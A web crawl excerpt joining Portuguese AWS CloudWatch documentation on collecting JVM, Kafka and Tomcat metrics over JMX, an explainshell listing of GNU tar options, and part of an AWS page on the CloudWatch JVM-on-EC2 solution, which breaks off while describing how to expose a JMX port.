diferente para essa métrica. unit : especifica a unidade a ser usada para essa métrica, substituindo a unidade padrão para a métrica. A unidade que você especificar deverá ser uma unidade de métrica válida do CloudWatch, conforme listado na descrição do Unit em MetricDatum . tomcat : opcional. Especifica que você deseja recuperar métricas do Tomcat na instância. Para obter mais informações, consulte Coleta métricas do Tomcat . A seção pode incluir os seguintes campos: measurement : especifica a matriz de métricas do Tomcat a serem coletadas. Para obter uma lista dos valores de uso possíveis, consulte a coluna Metric (Métrica) na tabela em Coleta métricas do Tomcat . Na entrada de cada métrica individual, você também poderá especificar uma ou ambas das seguintes opções: rename : especifica um nome diferente para essa métrica. unit : especifica a unidade a ser usada para essa métrica, substituindo a unidade padrão para a métrica. A unidade que você especificar deverá ser uma unidade de métrica válida do CloudWatch, conforme listado na descrição do Unit em MetricDatum . A seção jmx também pode incluir o campo append_dimensions opcional: append_dimensions : opcional. Dimensões adicionais a serem usadas somente para métricas de processo. Se você especificar esse campo, ele será usado em complemento às dimensões especificadas no campo append_dimensions que é usado para todos os tipos de métricas coletadas pelo atendente. Os campos a seguir são apenas para o Amazon EC2. endpoint : o endereço ao qual o cliente JMX se conectar. O formato é ip:port . Se o endpoint não for o localhost, a autenticação por senha e o SSL deverão estar habilitados. metrics_collection_interval : opcional. Especifica a frequência da coleta de métricas de processos, substituindo o metrics_collection_interval global especificado na seção agent do arquivo de configuração. Esse valor é especificado em segundos. Por exemplo, a especificação de 10 faz com que as métricas sejam coletadas a cada 10 segundos. Uma configuração de 300 especifica que as métricas sejam coletadas a cada 5 minutos. Se você definir esse valor abaixo de 60 segundos, cada métrica será coletada como uma métrica de alta resolução. Para obter mais informações, consulte Métricas de alta resolução . Se o JMX foi habilitado com autenticação por senha ou SSL para acesso remoto, você pode usar os campos a seguir. password_file : opcional. Especifica um arquivo de propriedades Java de chaves para senhas. O arquivo deve ser somente leitura e restrito ao usuário que está executando o agente do CloudWatch. Se a autenticação por senha estiver habilitada, isso exigirá o mesmo par de nome de usuário e senha da entrada no arquivo de senha do JMX fornecido na propriedade com.sun.management.jmxremote.password.file . Se o SSL estiver habilitado, ele exigirá entradas para keystore e truststore e fará a correspondência ao javax.net.ssl.keyStorePassword e javax.net.ssl.trustStorePassword , respectivamente. username : se a autenticação por senha estiver habilitada, especifique o nome de usuário que corresponde ao nome de usuário no arquivo de senha fornecido. keystore_path : se o SSL estiver habilitado, especifique o caminho completo para o keystore JAVA, que consiste em uma chave privada e um certificado para a chave pública. Corresponde à propriedade javax.net.ssl.keyStore . keystore_type : se o SSL estiver habilitado, especifique o tipo de keystore que está sendo usado. Corresponde à propriedade javax.net.ssl.keyStoreType . truststore_path : se o SSL estiver habilitado, especifique o caminho completo para o truststore Java, que deve conter o certificado público do servidor JMX remoto. Corresponde à propriedade javax.net.ssl.trustStore . truststore_type : se o SSL estiver habilitado, especifique o tipo de truststore que está sendo usado. Corresponde à propriedade javax.net.ssl.trustStoreType . remote_profile : opcional. Os perfis remotos compatíveis do JMX são TLS em combinação com os perfis do SASL: SASL/PLAIN , SASL/DIGEST-MD5 e SASL/CRAM-MD5 . Deve ser um dos seguintes: SASL/PLAIN , SASL/DIGEST-MD5 , SASL/CRAM-MD5 , TLS SASL/PLAIN , TLS SASL/DIGEST-MD5 ou TLS SASL/CRAM-MD5 realm : opcional. O realm, conforme exigido pelo perfil SASL/DIGEST-MD5 remoto. registry_ssl_enabled : se a autenticação por registro RMI estiver habilitada. Defina como true se a JVM tiver sido configurada com com.sun.management.jmxremote.registry.ssl=true . insecure Defina como true para cancelar a validação necessária se o agente estiver configurado para um endpoint não localhost. A seguir, veja um exemplo da seção jmx do arquivo de configuração do agente do CloudWatch. { "metrics": { "metrics_collected": { "jmx": [ { "endpoint": "remotehost:1314", "jvm": { "measurement": [ "jvm.memory.heap.init", "jvm.memory.nonheap.used" ] }, "kafka": { "measurement": [ "kafka.request.count", { "name": "kafka.message.count", "rename": "KAFKA_MESSAGE_COUNT", "unit": "Count" } ] }, "username": "cwagent", "keystore_path": "/path/to/keystore", "keystore_type": "PKCS12", "truststore_path": "/path/to/truststore", "truststore_type": "PKCS12" }, { "endpoint": "localhost:1315", "kafka-producer": { "measurement": [ "kafka.producer.request-rate" ] }, "append_dimensions": { "service.name": "kafka/1" } } ] } } } Coletar métricas da JVM Você pode usar o agente do CloudWatch para coletar métricas da Java Virtual Machine (JVM). Para configurar, adicione uma seção jvm à seção jmx do arquivo de configuração do atendente do CloudWatch. As seguintes métricas podem ser coletadas. Métrica Dimensões Descrição jvm.classes.loaded [DEFAULT] O número total de classes carregadas. Unidade: nenhuma Estatísticas significativas: mínimo, máximo, média jvm.gc.collections.count [DEFAULT], name O número total de coletas de resíduos que ocorreram. Unidade: nenhuma Estatísticas significativas: mínimo, máximo, média jvm.gc.collections.elapsed [DEFAULT], name O tempo decorrido aproximado da coleta de resíduos acumulada. Unidade: milissegundos Estatísticas significativas: mínimo, máximo, média jvm.memory.heap.init [DEFAULT] A quantidade inicial de memória que a JVM solicita do sistema operacional para o heap. Unidade: bytes Estatísticas significativas: mínimo, máximo, média jvm.memory.heap.max [DEFAULT] A quantidade máxima de memória que pode ser usada para o heap. Unidade: bytes Estatísticas significativas: Máximo jvm.memory.heap.used [DEFAULT] O uso atual da memória do heap. Unidade: bytes Estatísticas significativas: mínimo, máximo, média jvm.memory.heap.committed [DEFAULT] A quantidade de memória que é garantida como disponível para o heap. Unidade: bytes Estatísticas significativas: mínimo, máximo, média jvm.memory.nonheap.init [DEFAULT] A quantidade inicial de memória que a JVM solicita do sistema operacional para fins não relacionados ao heap. Unidade: bytes Estatísticas significativas: mínimo, máximo, média jvm.memory.nonheap.max [DEFAULT] A quantidade máxima de memória que pode ser usada para fins não relacionados ao heap. Unidade: bytes Estatísticas significativas: Máximo jvm.memory.nonheap.used [DEFAULT] O uso atual de memória não heap. Unidade: bytes Estatísticas significativas: mínimo, máximo, média jvm.memory.nonheap.committed [DEFAULT] A quantidade de memória que é garantida como disponível para fins que não relacionados ao heap. Unidade: bytes Estatísticas significativas: Mínimo, Máximo, Média jvm.memory.pool.init [DEFAULT], name A quantidade inicial de memória que a JVM solicita do sistema operacional para o pool de memória. Unidade: bytes Estatísticas significativas: Mínimo, Máximo, Média jvm.memory.pool.max [DEFAULT], name A quantidade máxima de memória que pode ser usada para o pool de memória. Unidade: bytes Estatísticas significativas: Máximo jvm.memory.pool.used [DEFAULT], name O uso atual da memória do pool de memória. Unidade: bytes Estatísticas significativas: Mínimo, Máximo, Média jvm.memory.pool.committed [DEFAULT], name A quantidade de memória que é garantida como disponível para o pool de memória. Unidade: bytes Estatísticas significativas: mínimo, máximo, média jvm.threads.count [DEFAULT] O número atual de threads. Unidade: nenhuma Estatísticas significativas: mínimo, máximo, média As métricas da JVM são coletadas com as seguintes dimensões: Dimensão Descrição [DEFAULT] No Amazon EC2, por padrão, o host também é publicado como uma dimensão de métricas coletadas pelo agente do CloudWatch, a menos que você esteja usando o campo append_dimensions na seção metrics . Veja omit_hostname na seção do agente de Criar ou editar manualmente o arquivo de configuração do atendente do CloudWatch para obter mais informações. No Amazon EKS, por padrão, o contexto relacionado ao k8s também é publicado como dimensões de métricas ( k8s.container.name , k8s.deployment.name , k8s.namespace.name , k8s.node.name , k8s.pod.name e k8s.replicaset.name ). Eles podem ser filtrados usando o campo aggregation_dimensions . name Para as métricas jvm.gc.collections , o valor é o nome do coletor de resíduos. Para as métricas jvm.memory.pool , o valor é o nome do pool de memória. Coletar métricas do Kafka Você pode usar o agente do CloudWatch para coletar métricas do Apache Kafka. Para configurar, adicione uma ou mais das subseções a seguir na seção jmx do arquivo de configuração do agente do CloudWatch. Use uma seção kafka para coletar as métricas do operador do Kafka. Use uma seção kafka-consumer para coletar as métricas do consumidor do Kafka. Use uma seção kafka-producer para coletar as métricas do produtor do Kafka. Métricas do operador do Kafka As métricas a seguir podem ser coletadas dos operadores do Kafka. Métrica Dimensões Descrição kafka.message.count [DEFAULT] O número de mensagens recebidas pelo operador do Kafka. Unidade: nenhuma Estatísticas significativas: mínimo, máximo, média kafka.request.count [DEFAULT], type O número de solicitações recebidas pelo operador do Kafka. Unidade: nenhuma Estatísticas significativas: mínimo, máximo, média kafka.request.failed [DEFAULT], type O número de solicitações ao operador do Kafka que resultaram em uma falha. Unidade: nenhuma Estatísticas significativas: mínimo, máximo, média kafka.request.time.total [DEFAULT], type O tempo total que o operador do Kafka levou para atender às solicitações. Unidade: milissegundos Estatísticas significativas: Mínimo, Máximo, Média kafka.request.time.50p [DEFAULT], type O percentil 50 do tempo que o operador do Kafka levou para atender às solicitações. Unidade: milissegundos Estatísticas significativas: Mínimo, Máximo, Média kafka.request.time.99p [DEFAULT], type O percentil 99 do tempo que o operador do Kafka levou para atender às solicitações. Unidade: milissegundos Estatísticas significativas: Mínimo, Máximo, Média kafka.request.time.avg [DEFAULT], type O tempo médio que o operador do Kafka levou para atender às solicitações. Unidade: milissegundos Estatísticas significativas: Média kafka.network.io [DEFAULT], state O número de bytes recebidos ou enviados pelo operador do Kafka. Unidade: bytes Estatísticas significativas: Mínimo, Máximo, Média kafka.purgatory.size [DEFAULT], type O número de solicitações que aguardam no purgatório. Unidade: nenhuma Estatísticas significativas: mínimo, máximo, média kafka.partition.count [DEFAULT] O número de partições no operador do Kafka. Unidade: nenhuma Estatísticas significativas: mínimo, máximo, média kafka.partition.offline [DEFAULT] O número de partições que estão offline. Unidade: nenhuma Estatísticas significativas: mínimo, máximo, média kafka.partition.under_replicated [DEFAULT] O número de partições sub-replicadas. Unidade: nenhuma Estatísticas significativas: mínimo, máximo, média kafka.isr.operation.count [DEFAULT], operation O número de operações de redução e expansão de réplicas sincronizadas. Unidade: nenhuma Estatísticas significativas: mínimo, máximo, média kafka.max.lag [DEFAULT] O atraso máximo nas mensagens entre as réplicas seguidoras e líderes. Unidade: nenhuma Estatísticas significativas: Máximo kafka.controller.active.count [DEFAULT] O número de controladores ativos no operador. Unidade: nenhuma Estatísticas significativas: mínimo, máximo, média kafka.leader.election.rate [DEFAULT] Taxa de eleição do líder. Caso aumente, indica falhas do operador. Unidade: nenhuma Estatísticas significativas: mínimo, máximo, média kafka.unclean.election.rate [DEFAULT] Taxa de eleição do líder indeterminada. Caso aumente, indica falhas do operador. Unidade: nenhuma Estatísticas significativas: mínimo, máximo, média kafka.request.queue [DEFAULT] O tamanho da solicitação da fila. Unidade: nenhuma Estatísticas significativas: mínimo, máximo, média kafka.logs.flush.time.count [DEFAULT] A contagem de liberação de logs. Unidade: milissegundos Estatísticas significativas: mínimo, máximo, média kafka.logs.flush.time.median [DEFAULT] O valor do percentil 50 da contagem de liberação de logs. Unidade: milissegundos Estatísticas significativas: mínimo, máximo, média kafka.logs.flush.time.99p [DEFAULT] O valor do percentil 99 da contagem de liberação de logs. Unidade: milissegundos Estatísticas significativas: mínimo, máximo, média As métricas do operador do Kafka são coletadas com as seguintes dimensões: Dimensão Descrição [DEFAULT] No Amazon EC2, por padrão, o host também é publicado como uma dimensão de métricas coletadas pelo agente do CloudWatch, a menos que você esteja usando o campo append_dimensions na seção metrics . Veja omit_hostname na seção do agente de Criar ou editar manualmente o arquivo de configuração do atendente do CloudWatch para obter mais informações. No Amazon EKS, por padrão, o contexto relacionado ao k8s também é publicado como dimensões de métricas ( k8s.container.name , k8s.deployment.name , k8s.namespace.name , k8s.node.name , k8s.pod.name e k8s.replicaset.name ). Eles podem ser filtrados usando o campo aggregation_dimensions . type O tipo da solicitação. Os valores possíveis são produce , fetch , fetchconsumer e fetchfollower . state A direção do tráfego de rede. Os possíveis valores são in e out . operation O tipo de operação da réplica sincronizada. Os possíveis valores são shrink e expand . Métricas do consumidor do Kafka As métricas a seguir podem ser coletadas pelos consumidores do Kafka. Métrica Dimensões Descrição kafka.consumer.fetch-rate [DEFAULT], client-id O número de solicitações de busca para todos os tópicos por segundo. Unidade: nenhuma Estatísticas significativas: mínimo, máximo, média kafka.consumer.records-lag-max [DEFAULT], client-id O número de mensagens que o consumidor está atrasado em relação ao produtor. Unidade: nenhuma Estatísticas significativas: mínimo, máximo, média kafka.consumer.total.bytes-consumed-rate [DEFAULT], client-id O número médio de bytes consumidos por segundo para todos os tópicos. Unidade: bytes Estatísticas significativas: Média kafka.consumer.total.fetch-size-avg [DEFAULT], client-id O número de bytes buscados por solicitação para todos os tópicos. Unidade: bytes Estatísticas significativas: Mínimo, Máximo, Média kafka.consumer.total.records-consumed-rate [DEFAULT], client-id O número médio de registros consumidos por segundo para todos os tópicos. Unidade: nenhuma Estatísticas significativas: Média kafka.consumer.bytes-consumed-rate [DEFAULT], client-id , topic O número médio de bytes consumidos por segundo. Unidade: bytes Estatísticas significativas: Média kafka.consumer.fetch-size-avg [DEFAULT], client-id , topic O número de bytes buscados por solicitação. Unidade: bytes Estatísticas significativas: mínimo, máximo, média kafka.consumer.records-consumed-rate [DEFAULT], client-id , topic O número médio de registros consumidos por segundo. Unidade: nenhuma Estatísticas significativas: Média As métricas do consumidor do Kafka são coletadas com as seguintes dimensões: Dimensão Descrição [DEFAULT] No Amazon EC2, por padrão, o host também é publicado como uma dimensão de métricas coletadas pelo agente do CloudWatch, a menos que você esteja usando o campo append_dimensions na seção metrics . Veja omit_hostname na seção do agente de Criar ou editar manualmente o arquivo de configuração do atendente do CloudWatch para obter mais informações. No Amazon EKS, por padrão, o contexto relacionado ao k8s também é publicado como dimensões de métricas ( k8s.container.name , k8s.deployment.name , k8s.namespace.name , k8s.node.name , k8s.pod.name e k8s.replicaset.name ). Eles podem ser filtrados usando o campo aggregation_dimensions . client-id O ID do cliente. topic O tópico do Kafka. Métricas do produtor do Kafka As métricas a seguir podem ser coletadas pelos produtores do Kafka. Métrica Dimensões Descrição kafka.producer.io-wait-time-ns-avg [DEFAULT], client-id O tempo médio que o thread de E/S ficou esperando por um socket pronto para leituras ou gravações. Unidade: nenhuma Estatísticas significativas: Média kafka.producer.outgoing-byte-rate [DEFAULT], client-id O número médio de bytes de saída enviados por segundo para todos os servidores. Unidade: bytes Estatísticas significativas: Média kafka.producer.request-latency-avg [DEFAULT], client-id A latência média da solicitação. Unidade: milissegundos Estatísticas significativas: Média kafka.producer.request-rate [DEFAULT], client-id O número médio de solicitações enviadas por segundo. Unidade: nenhuma Estatísticas significativas: Média kafka.producer.response-rate [DEFAULT], client-id O número de respostas recebidas por segundo. Unidade: nenhuma Estatísticas significativas: Mínimo, Máximo, Média kafka.producer.byte-rate [DEFAULT], client-id , topic O número médio de bytes enviados por segundo para um tópico. Unidade: bytes Estatísticas significativas: Média kafka.producer.compression-rate [DEFAULT], client-id , topic A taxa média de compactação dos lotes de registros de um tópico. Unidade: nenhuma Estatísticas significativas: Média kafka.producer.record-error-rate [DEFAULT], client-id , topic O número médio por segundo de envios de registros que resultaram em erros para um tópico. Unidade: nenhuma Estatísticas significativas: Média kafka.producer.record-retry-rate [DEFAULT], client-id , topic O número médio por segundo de tentativas de envio de registros de um tópico. Unidade: nenhuma Estatísticas significativas: Média kafka.producer.record-send-rate [DEFAULT], client-id , topic O número médio de registros enviados por segundo para um tópico. Unidade: nenhuma Estatísticas significativas: Média As métricas do produtor do Kafka são coletadas com as seguintes dimensões: Dimensão Descrição [DEFAULT] No Amazon EC2, por padrão, o host também é publicado como uma dimensão de métricas coletadas pelo agente do CloudWatch, a menos que você esteja usando o campo append_dimensions na seção metrics . Veja omit_hostname na seção do agente de Criar ou editar manualmente o arquivo de configuração do atendente do CloudWatch para obter mais informações. No Amazon EKS, por padrão, o contexto relacionado ao k8s também é publicado como dimensões de métricas ( k8s.container.name , k8s.deployment.name , k8s.namespace.name , k8s.node.name , k8s.pod.name e k8s.replicaset.name ). Eles podem ser filtrados usando o campo aggregation_dimensions . client-id O ID do cliente. topic O tópico do Kafka. Coleta métricas do Tomcat Você pode usar o agente do CloudWatch para coletar métricas do Apache Tomcat. Para configurar, adicione uma seção tomcat à seção metrics_collected do arquivo de configuração do atendente do CloudWatch. As seguintes métricas podem ser coletadas. Métrica Dimensões Descrição tomcat.sessions [DEFAULT] O número de sessões ativas. Unidade: nenhuma Estatísticas significativas: mínimo, máximo, média tomcat.errors [DEFAULT], proto_handler A quantidade de erros encontrada. Unidade: nenhuma Estatísticas significativas: mínimo, máximo, média tomcat.processing_time [DEFAULT], proto_handler O tempo total de processamento. Unidade: milissegundos Estatísticas significativas: Mínimo, Máximo, Média tomcat.traffic [DEFAULT], proto_handler O número de bytes recebidos e enviados. Unidade: bytes Estatísticas significativas: Mínimo, Máximo, Média tomcat.threads [DEFAULT], proto_handler O número de threads. Unidade: nenhuma Estatísticas significativas: Mínimo, Máximo, Média tomcat.max_time [DEFAULT], proto_handler , direction Tempo máximo para processar uma solicitação. Unidade: milissegundos Estatísticas significativas: Máximo tomcat.request_count [DEFAULT], proto_handler O total de solicitações. Unidade: nenhuma Estatísticas significativas: Mínimo, Máximo, Média As métricas do Tomcat são coletadas com as seguintes dimensões: Dimensão Descrição [DEFAULT] No Amazon EC2, por padrão, o host também é publicado como uma dimensão de métricas coletadas pelo agente do CloudWatch, a menos que você esteja usando o campo append_dimensions na seção metrics . Veja omit_hostname na seção do agente de Criar ou editar manualmente o arquivo de configuração do atendente do CloudWatch para obter mais informações. No Amazon EKS, por padrão, o contexto relacionado ao k8s também é publicado como dimensões de métricas ( k8s.container.name , k8s.deployment.name , k8s.namespace.name , k8s.node.name , k8s.pod.name e k8s.replicaset.name ). Eles podem ser filtrados usando o campo aggregation_dimensions . proto_handler O proto_handler é um identificador para um conector, que é fornecido no formato <protocol>-<type>-<port> (por exemplo, http-nio-8080 ). direction A direção do tráfego. Os possíveis valores são received e sent . O Javascript está desativado ou não está disponível no seu navegador. Para usar a documentação da AWS, o Javascript deve estar ativado. Consulte as páginas de Ajuda do navegador para obter instruções. Convenções do documento Colete métricas de GPU NVIDIA Coletar métricas e rastreamentos com o OpenTelemetry Essa página foi útil? - Sim Obrigado por nos informar que estamos fazendo um bom trabalho! Se tiver tempo, conte-nos sobre o que você gostou para que possamos melhorar ainda mais. Essa página foi útil? - Não Obrigado por nos informar que precisamos melhorar a página. Lamentamos ter decepcionado você. Se tiver tempo, conte-nos como podemos melhorar a documentação. | 2026-01-13T09:29:26 |
https://explainshell.com/explain/1/tar | explainshell.com - tar(1) - The GNU version of the tar archiving utility explain shell . com about theme Light Dark tar(1) other manpages bsdtar(1) - The GNU version of the tar archiving utility tar [ - ] A --catenate --concatenate | c --create | d --diff --compare | --delete | r --append | t --list | --test-label | u --update | x --extract --get [ options ] [ pathname ... ] -A , --catenate , --concatenate append tar files to an archive -c , --create create a new archive -d , --diff , --compare find differences between archive and file system --delete delete from the archive (not on mag tapes!) -r , --append append files to the end of an archive -t , --list list the contents of an archive --test-label test the archive volume label and exit -u , --update only append files newer than copy in archive -x , --extract , --get extract files from an archive -a , --auto-compress use archive suffix to determine the compression program --add-file = FILE add given FILE to the archive (useful if its name starts with a dash) --anchored patterns match file name start --no-anchored patterns match after any `/' (default for exclusion) --atime-preserve preserve access times on dumped files, either by restoring the times --no-auto-compress do not use archive suffix to determine the compression program -b , --blocking-factor BLOCKS BLOCKS x 512 bytes per record -B , --read-full-records reblock as we read (for 4.2BSD pipes) --backup backup before removal, choose version CONTROL -C , --directory DIR change to directory DIR --check-device check device numbers when creating incremental archives (default) --no-check-device do not check device numbers when creating incremental archives --checkpoint display progress messages every NUMBERth record (default 10) --checkpoint-action = ACTION execute ACTION on each checkpoint --delay-directory-restore delay setting modification times and permissions of extracted --no-delay-directory-restore cancel the effect of --delay-directory-restore option --exclude = PATTERN exclude files, given as a PATTERN --exclude-backups exclude backup and lock files --exclude-caches exclude contents of directories containing CACHEDIR.TAG, --exclude-caches-all exclude directories containing CACHEDIR.TAG --exclude-caches-under exclude everything under directories containing CACHEDIR.TAG --exclude-tag = FILE exclude contents of directories containing FILE, except --exclude-tag-all = FILE exclude directories containing FILE --exclude-tag-under = FILE exclude everything under directories containing FILE --exclude-vcs exclude version control system directories -f , --file ARCHIVE use archive file or device ARCHIVE -F , --info-script , --new-volume-script NAME run script at end of each tape (implies -M) --force-local archive file is local even if it has a colon --full-time print file time to its full resolution -g , --listed-incremental FILE handle new GNU-format incremental backup -G , --incremental handle old GNU-format incremental backup --group = NAME force NAME as group for added files -h , --dereference follow symlinks; archive and dump the files they point to -H , --format FORMAT create archive of the given formatFORMAT is one of the following: --format=gnu GNU tar 1.13.x format --format=oldgnu GNU format as per tar <= 1.12 --format=pax POSIX 1003.1-2001 (pax) format --format=posix same as pax --format=ustar POSIX 1003.1-1988 (ustar) format --format=v7 old V7 tar format --hard-dereference follow hard links; archive and dump the files they refer to -i , --ignore-zeros ignore zeroed blocks in archive (means EOF) -I , --use-compress-program PROG filter through PROG (must accept -d) --ignore-case ignore case --no-ignore-case case sensitive matching (default) --ignore-command-error ignore exit codes of children --no-ignore-command-error treat non-zero exit codes of children as error --ignore-failed-read do not exit with nonzero on unreadable files --index-file = FILE send verbose output to FILE -j , --bzip2 -J , --xz -k , --keep-old-files don't replace existing files when extracting -K , --starting-file MEMBER-NAME begin at member MEMBER-NAME in the archive --keep-newer-files don't replace existing files that are newer than their archive copies -l , --check-links print a message if not all links are dumped -L , --tape-length NUMBER change tape after writing NUMBER x 1024 bytes --level = NUMBER dump level for created listed-incremental archive --lzip --lzma --lzop -m , --touch don't extract file modified time -M , --multi-volume create/list/extract multi-volume archive --mode = CHANGES force (symbolic) mode CHANGES for added files --mtime = DATE-OR-FILE set mtime for added files from DATE-OR-FILE -n , --seek archive is seekable -N , --newer , --after-date DATE-OR-FILE only store files newer than DATE-OR-FILE --newer-mtime = DATE compare date and time when data changed only --null -T reads null-terminated names, disable -C --no-null disable the effect of the previous --null option --numeric-owner always use numbers for user/group names -O , --to-stdout extract files to standard output --occurrence process only the NUMBERth occurrence of each file in the archive; --old-archive , --portability same as --format=v7 --one-file-system stay in local file system when creating archive --overwrite overwrite existing files when extracting --overwrite-dir overwrite metadata of existing directories when extracting (default) --no-overwrite-dir preserve metadata of existing directories --owner = NAME force NAME as owner for added files -p , --preserve-permissions , --same-permissions extract information about file permissions (default for superuser) -P , --absolute-names don't strip leading `/'s from file names --pax-option = keyword[[:]=value][,keyword[[:]=value]]... control pax keywords --posix same as --format=posix --preserve same as both -p and -s --quote-chars = STRING additionally quote characters from STRING --no-quote-chars = STRING disable quoting for characters from STRING --quoting-style = STYLE set name quoting style; see below for valid STYLE values -R , --block-number show block number within archive with each message --record-size = NUMBER NUMBER of bytes per record, multiple of 512 --recursion recurse into directories (default) --no-recursion avoid descending automatically in directories --recursive-unlink empty hierarchies prior to extracting directory --remove-files remove files after adding them to the archive --restrict disable use of some potentially harmful options --rmt-command = COMMAND use given rmt COMMAND instead of rmt --rsh-command = COMMAND use remote COMMAND instead of rsh -s , --preserve-order , --same-order sort names to extract to match archive -S , --sparse handle sparse files efficiently --same-owner try extracting files with the same ownership as exists in the archive (default for superuser) --no-same-owner extract files as yourself (default for ordinary users) --no-same-permissions apply the user's umask when extracting permissions from the archive (default for ordinary users) --no-seek archive is not seekable --show-defaults show tar defaults --show-omitted-dirs when listing or extracting, list each directory that does not match search criteria --show-transformed-names , --show-stored-names show file or archive names after transformation --sparse-version = MAJOR[.MINOR] set version of the sparse format to use (implies --sparse) --strip-components = NUMBER strip NUMBER leading components from file names on extraction --suffix = STRING backup before removal, override usual suffix ('~' unless overridden by environment variable SIMPLE_BACKUP_SUFFIX) -T , --files-from FILE get names to extract or create from FILE --to-command = COMMAND pipe extracted files to another program --totals print total bytes after processing the archive; --transform , --xform EXPRESSION use sed replace EXPRESSION to transform file names -U , --unlink-first remove each file prior to extracting over it --unquote unquote filenames read with -T (default) --no-unquote do not unquote filenames read with -T --utc print file modification times in UTC -v , --verbose verbosely list files processed -V , --label TEXT create archive with volume name TEXT; at list/extract time, use TEXT as a globbing pattern for volume name --volno-file = FILE use/update the volume number in FILE -w , --interactive , --confirmation ask for confirmation for every action -W , --verify attempt to verify the archive after writing it --warning = KEYWORD warning control --wildcards use wildcards (default for exclusion) --wildcards-match-slash wildcards match `/' (default for exclusion) --no-wildcards-match-slash wildcards do not match `/' --no-wildcards verbatim string matching -X , --exclude-from FILE exclude patterns listed in FILE -z , --gzip , --gunzip --ungzip -Z , --compress , --uncompress | 2026-01-13T09:29:26 |
https://docs.aws.amazon.com/pt_br/AmazonCloudWatch/latest/monitoring/Solution-JVM-On-EC2.html#Solution-JVM-Dashboard | Solução do CloudWatch: workload da JVM no Amazon EC2 - Amazon CloudWatch Solução do CloudWatch: workload da JVM no Amazon EC2 - Amazon CloudWatch Documentação Amazon CloudWatch Guia do usuário Requisitos Benefícios Custos Configuração do agente do CloudWatch para esta solução Implantação do agente para a sua solução Criação de um painel para a solução da JVM Solução do CloudWatch: workload da JVM no Amazon EC2 Esta solução auxilia na configuração da coleta de métricas prontas para uso com agentes do CloudWatch para aplicações da JVM que estão sendo executadas em instâncias do EC2. Além disso, a solução ajuda na configuração de um painel do CloudWatch configurado previamente. Para obter informações gerais sobre todas as soluções de observabilidade do CloudWatch, consulte Soluções de observabilidade do CloudWatch . Tópicos Requisitos Benefícios Custos Configuração do agente do CloudWatch para esta solução Implantação do agente para a sua solução Criação de um painel para a solução da JVM Requisitos Esta solução é aplicável nas seguintes condições: Versões compatíveis: versões LTS do Java 8, 11, 17 e 21 Computação: Amazon EC2 Fornecimento de suporte para até 500 instâncias do EC2 em todas as workloads da JVM em uma Região da AWS específica Versão mais recente do agente do CloudWatch SSM Agent instalado na instância do EC2 nota O AWS Systems Manager (SSM Agent) está instalado previamente em algumas imagens de máquinas da Amazon (AMIs) fornecidas pela AWS e por entidades externas confiáveis. Se o agente não estiver instalado, você poderá instalá-lo manualmente usando o procedimento adequado para o seu tipo de sistema operacional. Instalar e desinstalar o SSM Agent manualmente em instâncias do EC2 para Linux Instalar e desinstalar o SSM Agent manualmente em instâncias do EC2 para macOS Instalar e desinstalar o SSM Agent manualmente em instâncias do EC2 para Windows Server Benefícios A solução disponibiliza monitoramento da JVM, fornecendo insights valiosos para os seguintes casos de uso: Monitoramento do uso de memória do heap e de memória não relacionada ao heap da JVM. Análise de threads e de carregamento de classes para identificar problemas de simultaneidade. Rastreamento da coleta de resíduos para identificar possíveis vazamentos de memória. Alternância entre diferentes aplicações da JVM configuradas pela solução na mesma conta. A seguir, apresentamos as principais vantagens da solução: Automatiza a coleta de métricas para a JVM usando a configuração do agente do CloudWatch, o que elimina a necessidade de instrumentação manual. Fornece um painel do CloudWatch consolidado e configurado previamente para as métricas da JVM. O painel gerenciará automaticamente as métricas das novas instâncias do EC2 para a JVM que foram configuradas usando a solução, mesmo que essas métricas não estejam disponíveis no momento de criação do painel. Além disso, o painel permite agrupar as métricas em aplicações lógicas para facilitar o foco e o gerenciamento. A imagem apresentada a seguir é um exemplo do painel para esta solução. Custos Esta solução cria e usa recursos em sua conta. A cobrança será realizada com base no uso padrão, que inclui o seguinte: Todas as métricas coletadas pelo agente do CloudWatch são cobradas como métricas personalizadas. O número de métricas usadas por esta solução depende do número de hosts do EC2. Cada host da JVM configurado para a solução publica um total de 18 métricas, além de uma métrica ( disk_used_percent ) cuja contagem de métricas depende do número de caminhos fornecidos para o host. Um painel personalizado. As operações da API solicitadas pelo agente do CloudWatch para publicar as métricas. Com a configuração padrão para esta solução, o agente do CloudWatch chama a operação PutMetricData uma vez por minuto para cada host do EC2. Isso significa que a API PutMetricData será chamada 30*24*60=43,200 em um mês com 30 dias para cada host do EC2. Para obter mais informações sobre os preços do CloudWatch, consulte Preço do Amazon CloudWatch . A calculadora de preços pode ajudar a estimar os custos mensais aproximados para o uso desta solução. Como usar a calculadora de preços para estimar os custos mensais da solução Abra a calculadora de preços do Amazon CloudWatch . Em Escolher uma região , selecione a região em que você gostaria de implantar a solução. Na seção Métricas , em Número de métricas , insira (18 + average number of disk paths per EC2 host) * number of EC2 instances configured for this solution . Na seção APIs , em Número de solicitações de API , insira 43200 * number of EC2 instances configured for this solution . Por padrão, o agente do CloudWatch executa uma operação PutMetricData a cada minuto para cada host do EC2. Na seção Painéis e alarmes , em Número de painéis , insira 1 . É possível visualizar os custos mensais estimados na parte inferior da calculadora de preços. Configuração do agente do CloudWatch para esta solução O agente do CloudWatch é um software que opera de maneira contínua e autônoma em seus servidores e em ambientes com contêineres. Ele coleta métricas, logs e rastreamentos da infraestrutura e das aplicações e os envia para o CloudWatch e para o X-Ray. Para obter mais informações sobre o agente do CloudWatch, consulte Coleta de métricas, logs e rastreamentos usando o agente do CloudWatch . A configuração do agente nesta solução coleta as métricas fundamentais para a solução. O agente do CloudWatch pode ser configurado para coletar mais métricas da JVM do que as que são exibidas por padrão no painel. Para obter uma lista de todas as métricas da JVM que você pode coletar, consulte Coletar métricas da JVM . Para obter informações gerais sobre a configuração do agente do CloudWatch, consulte Métricas coletadas pelo atendente do CloudWatch . Exposição de portas do JMX para a aplicação da JVM O agente do CloudWatch depende do JMX para coletar as métricas relacionadas ao processo da JVM. Para que isso aconteça, é necessário expor a porta do JMX da aplicação da JVM. As instruções para expor a porta do JMX dependem do tipo de workload que você está usando para a aplicação da JVM. Consulte a documentação específica para a aplicação para encontrar essas instruções. De maneira geral, para habilitar uma porta do JMX para monitoramento e gerenciamento, você precisa configurar as propriedades do sistema apresentadas a seguir para a aplicação da JVM. Certifique-se de especificar um número de porta que não esteja em uso. O exemplo apresentado a seguir configura o JMX sem autenticação. Se suas políticas ou seus requisitos de segurança exigirem que você habilite o JMX com autenticação por senha ou SSL para a obtenção de acesso remoto, consulte a documentação do JMX para definir a propriedade necessária. -Dcom.sun.management.jmxremote -Dcom.sun.management.jmxremote.port= port-number 